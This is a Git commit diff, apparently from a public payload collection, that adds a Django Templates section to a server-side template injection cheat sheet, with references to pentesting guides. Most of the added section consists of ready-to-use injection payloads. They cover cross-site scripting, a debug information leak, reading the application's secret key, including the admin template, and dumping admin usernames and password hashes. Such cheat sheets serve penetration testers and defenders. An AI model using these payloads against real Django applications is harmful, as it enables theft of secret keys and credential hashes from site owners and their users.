Add Django Templates SSTI

This commit is contained in:
Techbrunch 2022-08-30 13:50:03 +02:00 committed by GitHub
parent fbd7517e04
commit 871b3bcaf2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -33,6 +33,7 @@
- [Java - Basic injection](#java---basic-injection) - [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables)
- [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd) - [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
- [Django Template](#django-template)
- [Jinja2](#jinja2) - [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Template format](#jinja2---template-format)
@ -337,6 +338,58 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
--- ---
## Django Templates
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Django Templates for post-exploitation
```python
# Variables
{{ variable }}
{{ variable.attr }}
# Filters
{{ value|length }}
# Tags
{% csrf_token %}
```
### Cross-site scripting
```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```
### Debug information leak
```python
{% debug %}
```
### Leaking apps Secret Key
```python
{{ messages.storages.0.signer.key }}
```
### Admin Site URL leak
```
{% include 'admin/base.html' %}
```
### Admin username and password hash leak
```
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
```
## Jinja2 ## Jinja2
[Official website](https://jinja.palletsprojects.com/) [Official website](https://jinja.palletsprojects.com/)
@ -893,3 +946,4 @@ $str.valueOf($chr.toChars($out.read()))
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) * [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)